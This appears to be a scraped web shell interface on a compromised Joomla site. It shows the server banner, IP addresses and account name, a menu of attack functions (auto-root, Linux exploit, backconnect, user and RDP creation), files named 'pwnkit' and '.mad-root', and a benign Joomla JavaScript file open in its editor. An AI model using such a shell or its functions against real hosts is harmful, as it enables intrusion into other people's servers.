Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_mails /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-email-template-edit-es5....
3.5
KB
-rw----r--
admin-email-template-edit-es5....
1.78
KB
-rw----r--
admin-email-template-edit-es5....
636
B
-rw----r--
admin-email-template-edit.js
2.97
KB
-rw----r--
admin-email-template-edit.min....
1.64
KB
-rw----r--
admin-email-template-edit.min....
597
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-email-template-edit.js
/** * @copyright (C) 2019 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ ((document, Joomla) => { class EmailTemplateEdit { constructor(form, options) { // Set elements this.form = form; this.inputSubject = this.form.querySelector('#jform_subject'); this.inputBody = this.form.querySelector('#jform_body'); this.inputHtmlBody = this.form.querySelector('#jform_htmlbody'); // Set options this.templateData = options && options.templateData ? options.templateData : {}; // Add back reference this.form.EmailTemplateEdit = this; } setBodyValue(value) { if (Joomla.editors.instances[this.inputBody.id]) { Joomla.editors.instances[this.inputBody.id].setValue(value); } else { this.inputBody.value = value; } } setHtmlBodyValue(value) { if (Joomla.editors.instances[this.inputHtmlBody.id]) { Joomla.editors.instances[this.inputHtmlBody.id].setValue(value); } else { this.inputHtmlBody.value = value; } } insertTag(tag, targetField) { if (!tag) return false; let input; switch (targetField) { case 'body': input = this.inputBody; break; case 'htmlbody': input = this.inputHtmlBody; break; default: return false; } if (Joomla.editors.instances[input.id]) { Joomla.editors.instances[input.id].replaceSelection(tag); } else { input.value += ` ${tag}`; } return true; } bindListeners() { document.querySelector('#btnResetSubject').addEventListener('click', event => { event.preventDefault(); this.inputSubject.value = this.templateData.subject ? this.templateData.subject : ''; }); const btnResetBody = document.querySelector('#btnResetBody'); if (btnResetBody) { btnResetBody.addEventListener('click', event => { event.preventDefault(); this.setBodyValue(this.templateData.body ? this.templateData.body : ''); }); } const btnResetHtmlBody = document.querySelector('#btnResetHtmlBody'); if (btnResetHtmlBody) { btnResetHtmlBody.addEventListener('click', event => { event.preventDefault(); this.setHtmlBodyValue(this.templateData.htmlbody ? this.templateData.htmlbody : ''); }); } // Buttons for inserting a tag this.form.querySelectorAll('.edit-action-add-tag').forEach(button => { button.addEventListener('click', event => { event.preventDefault(); const el = event.target; this.insertTag(el.dataset.tag, el.dataset.target); }); }); } } document.addEventListener('DOMContentLoaded', () => { const editor = new EmailTemplateEdit(document.getElementById('item-form'), Joomla.getOptions('com_mails')); editor.bindListeners(); }); })(document, Joomla);
Close